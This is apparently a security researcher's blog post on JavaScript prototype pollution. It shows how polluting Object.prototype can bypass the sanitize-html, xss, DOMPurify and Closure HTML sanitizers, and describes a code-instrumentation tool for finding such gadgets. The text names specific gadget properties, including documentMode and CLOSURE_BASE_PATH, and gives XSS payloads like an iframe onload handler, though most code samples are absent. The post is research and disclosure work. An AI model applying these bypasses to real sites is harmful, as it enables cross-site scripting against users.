Prototype pollution – and bypassing client-side HTML sanitizers

In this article I’ll cover the prototype pollution vulnerability and show it can be used to bypass client-side HTML sanitizers. I’m also considering various ways to find exploitation of prototype pollution via semi-automatic methods. It could also be a big help in solving my XSS challenge.

Prototype pollution basics

Prototype pollution is a security vulnerability, quite specific to JavaScript. It stems from JavaScript inheritance model called prototype-based inheritance. Unlike in C++ or Java, in JavaScript you don’t need to define a class to create an object. You just need to use the curly bracket notation and define properties, for example:

This object has two properties: prop1 and prop2. But these are not the only properties we can access. For example a call to obj.toString() would return "[object Object]". toString (along with some other default members) comes from the prototype. Every object in JavaScript has a prototype (it can also be null). If we don’t specify it, by default the prototype for an object is Object.prototype.

In DevTools, we can easily check a list of properties of Object.prototype:

We can also find out what object is a prototype of a given object, by checking its __proto__ member or by calling Object.getPrototypeOf:

Similarly, we can set the prototype of the object using __proto__ or Object.setPrototypeOf:

In a nutshell, when we try to access a property of an object, JS engine first checks if the object itself contains the property. If it does, then it is returned. Otherwise, JS checks if the prototype has the property. If it doesn’t, JS checks the prototype of the prototype… and so on, until the prototype is null. It’s called the prototype chain.

The fact that JS traverses the prototype chain has an important effect: if we could somehow pollute the Object.prototype (that is, extend it with new properties), then all JS objects would have these properties.

Consider the following example:

At the first sight, it may seem that it’s not possible to make the if-condition true as user object doesn’t have a property called admin. However, if we pollute the Object.prototype and define property called admin, then the console.log will execute!

This proves that prototype pollution may have a huge impact on security of applications as we can define properties that would change their logic. There are only a few known cases of abusing the vulnerability though (please let me know if you know more!):

Before going to the main point of this article, I need to cover one more topic: how the protype pollution may occur in the first place?

The entry point of this vulnerability is usually the merge operation (that is copying all properties from one object to the other object). For instance:

Sometimes the operation work recursively, for instance:

The basic flow of recursive merge is:

  1. Iterate over all properties of obj2 and check if they exist in obj1.
  2. If a property exists, then perform a merge operation on this property.
  3. If a property doesn’t exist, then copy it from obj2 to obj1.

In the real world, if user has any control of objects being merged, then usually one of the objects come from the output of JSON.parse. And JSON.parse is a little bit special because it treats __proto__ as a “normal” property, i.e. without its special meaning of being a prototype accessor. Consider the following example:

In the example, obj1 was created using the curly bracket notation of JS, while obj2 is created with JSON.parse. Both objects have only one property defined, called __proto__. However, accessing obj1.__proto__ returns Object.prototype (so __proto__ is the special property that returns the prototype), while obj2.__proto__ contains the value given in the JSON, namely: 123. This proves that __proto__ property is treated differently in JSON.parse than in ordinary JavaScript.

So now imagine a recursiveMerge function that merges two objects:

  • obj1={}
  • obj2=JSON.parse('{"__proto__":{"x":1}}')

The function would work more or less like the following steps:

  1. Iterate over all properties in obj2. The only property is __proto__.
  2. Check if obj1.__proto__ exists. It does.
  3. Iterate over all properties in obj2.__proto__. The only property is x.
  4. Assign: obj1.__proto__.x = obj2.__proto__.x. Because obj1.__proto__ points to Object.prototype, then the prototype is polluted.

This type of bug was identified in many popular JS libraries, including lodash or jQuery.

Prototype pollution and HTML sanitizers

Now we know what prototype pollution is and how a merge operation can introduce the vulnerability. As I mentioned earlier, all publicized examples of exploiting prototype pollution focused on NodeJS, where the goal was to achieve Remote Code Execution. However, client-side JavaScript can also be affected by the vulnerability. So the question I asked myself was: what can attackers gain from prototype pollution in the browser’s world?

I focused my attention on HTML sanitizers. HTML sanitizers are libraries whose job is to take an untrusted HTML markup, and delete all tags or attributes that could introduce an XSS attack. Usually they’re based on allow-lists; that is, they have a list of tags and attributes that are allowed, and all other ones are deleted.

Imagine that we have a sanitizer that allows only <b> and <h1> tags. If we fed it with the following markup:

It should clean it to the following form:

HTML sanitizers need to maintain the list of allowed elements attributes and elements. Basically, libraries usually employ one of two ways to store the list:

1. In an array

The library might have an array with a list of allowed elements, for instance:

Then to check if some element is allowed, they simply call ALLOWED_ELEMENTS.includes(element). This approach makes it safe from prototype pollution as we cannot extend an array; that is, we can’t pollute the length property, nor the indexes that already exist.

For instance, even if we do:

Then ALLOWED_ELEMENTS.length still returns 4 and ALLOWED_ELEMENTS[0] is still "h1".

2. In an object

The other solution is to store an object with allowed elements, for instance:

Then to check if some elements is allowed, the library may check for existence of ALLOWED_ELEMENTS[element]. This approach is easily exploitable via prototype pollution; since if we pollute the prototype the following way:

Then ALLOWED_ELEMENTS["SCRIPT"] returns true.

List of analyzed sanitizers

I searched for HTML sanitizers in npm and found three most popular ones:

  • sanitize-html with around 800k downloads per week
  • xss with around 770k downloads per week
  • dompurify with around 544k downloads per week

I also included google-closure-library, which isn’t very popular in npm, but is extremely commonly used in Google applications. And Google is my favourite bug bounty program so it was worth looking into.

In the next chapters I’ll give a short overview of all the sanitizers, and show how all of them can be bypassed with prototype pollution. I’ll assume that the prototype is polluted before the library is even loaded. I will also assume that all sanitizers are used in the default configuration.

sanitize-html

The invocation of sanitize-html is simple:

Optionally, you can pass second parameter to sanitizeHtml with options. But if you don’t, then default options are used:

allowedTags property is an array, which means we cannot use it in prototype pollution. It’s worth noticing, though, that iframe is allowed.

Moving forward, allowedAttributes is a map, which gives an idea that adding property iframe: ['onload'] should make it possible to perform XSS via <iframe onload=alert(1)>.

Internally, allowedAttributes are rewritten to a variable allowedAttributesMap. And here’s the logic that decides whether an attribute should be allowed or not (name is the name of the current tag, and a is the name of the attribute):

We will focus on checks on allowedAttributesMap. In a nutshell, it is checked whether the attribute is allowed for current tag or for all tags (when the wildcard '*' is used). Quite interestingly, sanitize-html has some sort of protection against prototype pollution:

hasOwnProperty checks whether an object has a property but it doesn’t traverse the prototype chain. This means that all calls to has function are not susceptible to prototype pollution. However, has is not used for wildcard!

So if I pollute the prototype with:

Then onload will be a valid attribute to any tag, which is proven below:

xss

Invocation of the next library, xss, looks quite similar:

It also can optionally accept a second parameter, called options. And the way it is processed is the most prototype-pollution-friendly pattern you could spot in JS code:

All these properties in form options.propertyName can be polluted. The obvious candidate is whiteList, which follows the following format:

So the idea is to define my own whitelist, accepting img tag with onerror and src attributes:

dompurify

Similarly to previous sanitizers, basic usage of DOMPurify is quite simple:

DOMPurify also accepts a second parameter with configuration. Here also comes a pattern that make it vulnerable to prototype pollution:

In JavaScript in operator traverses the prototype chain. Hence 'ALLOWED_ATTR' in cfg returns true if this property exists in the Object.prototype.

DOMPurify by default allows <img> tag, so the exploit requires only polluting ALLOWED_ATTR with onerror and src.

Interestingly, Cure53 released a new version of DOMPurify that attempts to protect against this very attack. If you think you can bypass the fix, have a look at an updated version of my challenge.

Closure

Closure Sanitizer has a file called attributewhitelist.js which follows the following format:

In this file a list of allowed attributes are defined. It follows the format "TAG_NAME ATTRIBUTE_NAME", where TAG_NAME could also be a wildcard ("*"). So a bypass is as simple as polluting the prototype to allow onerror and src on all elements.

The code below proves the bypass:

Identifying prototype pollution gadgets

I’ve shown above that prototype pollution can be a way to bypass all popular JS sanitizers. To find the bypasses, I needed to analyze the sources manually. Even though all bypasses are quite similar, it still required some effort to perform the analysis. So a natural next step is to think about a way to make the process more automatic.

My first idea was to use a regular expression to scan for all possible identifiers in the source code of a library, and then add this properties to Object.prototype. If any property is being accessed, then I know that it could be manipulated via prototype pollution.

Here’s an example, we have the following snippet taken from DOMPurify:

We can extract the following possible identifiers from the snippet (assuming that identifier is \w+):

Now I’m defining all these properties in Object.prototype, for instance:

This method works but have some serious drawbacks:

  • It won’t work for computed property names (so I wouldn’t find anything for Closure for instance),
  • It messes up checking if property exists: ALLOWED_ATTR in obj would return true which is undesirable.

So I came up with second idea; by definition I have access to source code of the library I’m trying to attack with prototype pollution. So I can use code instrumentation to change all property accesses to my own function, which would check if the property would reach the prototype.

Example: I have the following line taken from DOMPurify:

It would get transformed to:

Where $_GET_PROP is defined as:

Basically, all property accesses are converted to calls to $_GET_PROP which prints an information in the console when a property would be read from Object.prototype.

I created a tool to do the instrumentation that I’m also sharing on GitHub. Here’s how it looks like:

Thanks to this method I could spot two more instances of abusing prototype pollution to bypass sanitizers. Let’s see what was being logged when I run DOMPurify:

That’s something I missed in the first place. Let’s take a look at the line where documentMode is being accessed:

So DOMPurify checks whether current browser is modern enough to even work with DOMPurify. If isSupported is equal to false, then DOMPurify performs no sanitization whatsoever. This means that we can pollute the prototype and set Object.prototype.documentMode = 9 to make this happen. The snippet below proves it:

The downside is that the prototype needs to be polluted before DOMPurify is even loaded.

Let’s now have a look at Closure. First of all, it is now very easy to see that Closure attempts to check whether attributes are in an allow-list:

Second of all, I noticed an interestingly looking property:

Closure loads lots of JS files with dependencies. CLOSURE_BASE_PATH defines the path. So we can pollute the property to load our own JS from any path. The sanitizer doesn’t even need to be called!

Here’s a proof:

I believe that thanks to pollute.js, even more explotation scenarios could be found

Summary

The conclusion is that prototype pollution can lead to bypass of all popular HTML sanitizers. It can usually be done by affecting the allow-list of elements or attributes.

As a final note, if you ever find a prototype pollution in Google Search, then you have XSS in the search field!